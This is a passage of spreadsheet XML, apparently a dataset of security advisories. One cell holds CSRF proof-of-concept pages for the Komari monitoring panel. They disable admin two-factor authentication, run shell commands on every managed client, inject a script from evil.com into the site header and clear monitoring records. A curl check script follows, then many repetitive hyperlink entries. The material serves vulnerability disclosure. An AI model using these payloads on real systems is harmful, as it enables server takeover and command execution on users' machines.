```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/2fa/disable"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
  document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 2 — Remote Command Execution
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
var CMD    = "id &amp;&amp; hostname &amp;&amp; whoami";
fetch(KOMARI + "/api/admin/client/list", { credentials: "include" })
  .then(function(r){ return r.json(); })
  .then(function(data){
    var nodes = data.data || [];
    var uuids = [];
    for (var i = 0; i &lt; nodes.length; i++) {
      if (nodes[i].uuid) uuids.push(nodes[i].uuid);
    }
    if (uuids.length === 0) return;
    return fetch(KOMARI + "/api/admin/task/exec", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ command: CMD, clients: uuids })
    });
  });
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 3 — Modify System Configuration
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
fetch(KOMARI + "/api/admin/settings/", {
  method: "POST",
  credentials: "include",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    "site_name": "Pwned",
    "custom_head": "&lt;script src='https://evil.com/hook.js'&gt;&lt;\/script&gt;"
  })
});
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 4 — Clear All Monitoring Records
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/record/clear/all"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## Verification Script
```bash
#!/bin/bash
KOMARI="${1:-https://komari.example.com}"
echo "=== CSRF Verification ==="
echo "[1] Cookie Attributes..."
curl -s -D - -o /dev/null \
  -X POST "$KOMARI/api/public/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"test","password":"test"}' | grep -i 'set-cookie'
echo ""
echo "[2] CORS Headers..."
curl -s -D - -o /dev/null \
  -H "Origin: https://evil.com" \
  "$KOMARI/api/public/config" | grep -i 'access-control'
echo ""
echo "[3] CSRF Protection on Admin Endpoint..."
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$KOMARI/api/admin/settings/" \
  -H "Content-Type: application/json" \
  -H "Origin: https://evil.com" \
  -d '{}')
echo "    HTTP ${CODE} — A 401 response indicates that only session authentication is enforced and no CSRF protection is present."
```</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S642"/>
  <conditionalFormatting sqref="E2:E64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642">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S362" r:id="rId361"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S363" r:id="rId362"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S364" r:id="rId363"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S365" r:id="rId364"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S366" r:id="rId365"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S367" r:id="rId366"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S368" r:id="rId367"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S369" r:id="rId368"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S370" r:id="rId369"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S371" r:id="rId370"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S372" r:id="rId371"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S373" r:id="rId372"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S374" r:id="rId373"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S375" r:id="rId374"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S376" r:id="rId375"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S377" r:id="rId376"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S378" r:id="rId377"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S379" r:id="rId378"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S380" r:id="rId379"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S381" r:id="rId380"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S382" r:id="rId381"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S383" r:id="rId382"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S384" r:id="rId383"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S385" r:id="rId384"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S386" r:id="rId385"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S387" r:id="rId386"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S388" r:id="rId387"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S389" r:id="rId388"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S390" r:id="rId389"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S391" r:id="rId390"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S392" r:id="rId391"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S393" r:id="rId392"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S394" r:id="rId393"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S395" r:id="rId394"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S396" r:id="rId395"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S397" r:id="rId396"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S398" r:id="rId397"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S399" r:id="rId398"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S400" r:id="rId399"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S401" r:id="rId400"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S402" r:id="rId401"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S403" r:id="rId402"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S404" r:id="rId403"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S405" r:id="rId404"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S406" r:id="rId405"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S407" r:id="rId406"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S408" r:id="rId407"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S409" r:id="rId408"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S410" r:id="rId409"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S411" r:id="rId410"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S412" r:id="rId411"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S413" r:id="rId412"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S414" r:id="rId413"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S415" r:id="rId414"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S416" r:id="rId415"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S417" r:id="rId416"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S418" r:id="rId417"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S419" r:id="rId418"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S420" r:id="rId419"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S421" r:id="rId420"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S422" r:id="rId421"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S423" r:id="rId422"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S424" r:id="rId423"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S425" r:id="rId424"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S426" r:id="rId425"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S427" r:id="rId426"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S428" r:id="rId427"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S429" r:id="rId428"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S430" r:id="rId429"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S431" r:id="rId430"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S432" r:id="rId431"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S433" r:id="rId432"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S434" r:id="rId433"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S435" r:id="rId434"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S436" r:id="rId435"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S437" r:id="rId436"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S438" r:id="rId437"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S439" r:id="rId438"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S440" r:id="rId439"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S441" r:id="rId440"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S442" r:id="rId441"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S443" r:id="rId442"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S444" r:id="rId443"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S445" r:id="rId444"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S446" r:id="rId445"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S447" r:id="rId446"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S448" r:id="rId447"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S449" r:id="rId448"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S450" r:id="rId449"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S451" r:id="rId450"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S452" r:id="rId451"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S453" r:id="rId452"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S454" r:id="rId453"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S455" r:id="rId454"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S456" r:id="rId455"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S457" r:id="rId456"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S458" r:id="rId457"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S459" r:id="rId458"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S460" r:id="rId459"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S461" r:id="rId460"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S462" r:id="rId461"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S463" r:id="rId462"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S464" r:id="rId463"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S465" r:id="rId464"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S466" r:id="rId465"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S467" r:id="rId466"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S468" r:id="rId467"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S469" r:id="rId468"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S470" r:id="rId469"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S471" r:id="rId470"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S472" r:id="rId471"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S473" r:id="rId472"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S474" r:id="rId473"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S475" r:id="rId474"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S476" r:id="rId475"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S477" r:id="rId476"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S478" r:id="rId477"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S479" r:id="rId478"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S480" r:id="rId479"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S481" r:id="rId480"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S482" r:id="rId481"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S483" r:id="rId482"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S484" r:id="rId483"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S485" r:id="rId484"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S486" r:id="rId485"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S487" r:id="rId486"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S488" r:id="rId487"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S489" r:id="rId488"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S490" r:id="rId489"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S491" r:id="rId490"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S492" r:id="rId491"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S493" r:id="rId492"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S494" r:id="rId493"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S495" r:id="rId494"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S496" r:id="rId495"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S497" r:id="rId496"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S498" r:id="rId497"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S499" r:id="rId498"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S500" r:id="rId499"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S501" r:id="rId500"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S502" r:id="rId501"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S503" r:id="rId502"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S504" r:id="rId503"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S505" r:id="rId504"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S506" r:id="rId505"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S507" r:id="rId506"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S508" r:id="rId507"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S509" r:id="rId508"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S510" r:id="rId509"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S511" r:id="rId510"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S512" r:id="rId511"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S513" r:id="rId512"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S514" r:id="rId513"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S515" r:id="rId514"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S516" r:id="rId515"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S517" r:id="rId516"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S518" r:id="rId517"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S519" r:id="rId518"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S520" r:id="rId519"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S521" r:id="rId520"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S522" r:id="rId521"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S523" r:id="rId522"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S524" r:id="rId523"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S525" r:id="rId524"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S526" r:id="rId525"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S527" r:id="rId526"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S528" r:id="rId527"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S529" r:id="rId528"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S530" r:id="rId529"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S531" r:id="rId530"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S532" r:id="rId531"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S533" r:id="rId532"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S534" r:id="rId533"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S535" r:id="rId534"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S536" r:id="rId535"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S537" r:id="rId536"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S538" r:id="rId537"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S539" r:id="rId538"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S540" r:id="rId539"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S541" r:id="rId540"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S542" r:id="rId541"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S543" r:id="rId542"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S544" r:id="rId543"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S545" r:id="rId544"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S546" r:id="rId545"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S547" r:id="rId546"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S548" r:id="rId547"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S549" r:id="rId548"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S550" r:id="rId549"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S551" r:id="rId550"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S552" r:id="rId551"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S553" r:id="rId552"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S554" r:id="rId553"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S555" r:id="rId554"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S556" r:id="rId555"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S557" r:id="rId556"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S558" r:id="rId557"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S559" r:id="rId558"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S560" r:id="rId559"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S561" r:id="rId560"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S562" r:id="rId561"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S563" r:id="rId562"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S564" r:id="rId563"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S565" r:id="rId564"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S566" r:id="rId565"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S567" r:id="rId566"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S568" r:id="rId567"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S569" r:id="rId568"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S570" r:id="rId569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S571" r:id="rId570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S572" r:id="rId571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S573" r:id="rId572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S574" r:id="rId573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S575" r:id="rId574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S576" r:id="rId575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S577" r:id="rId576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S578" r:id="rId577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S579" r:id="rId578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S580" r:id="rId579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S581" r:id="rId580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S582" r:id="rId581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S583" r:id="rId582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S584" r:id="rId583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S585" r:id="rId584"/>
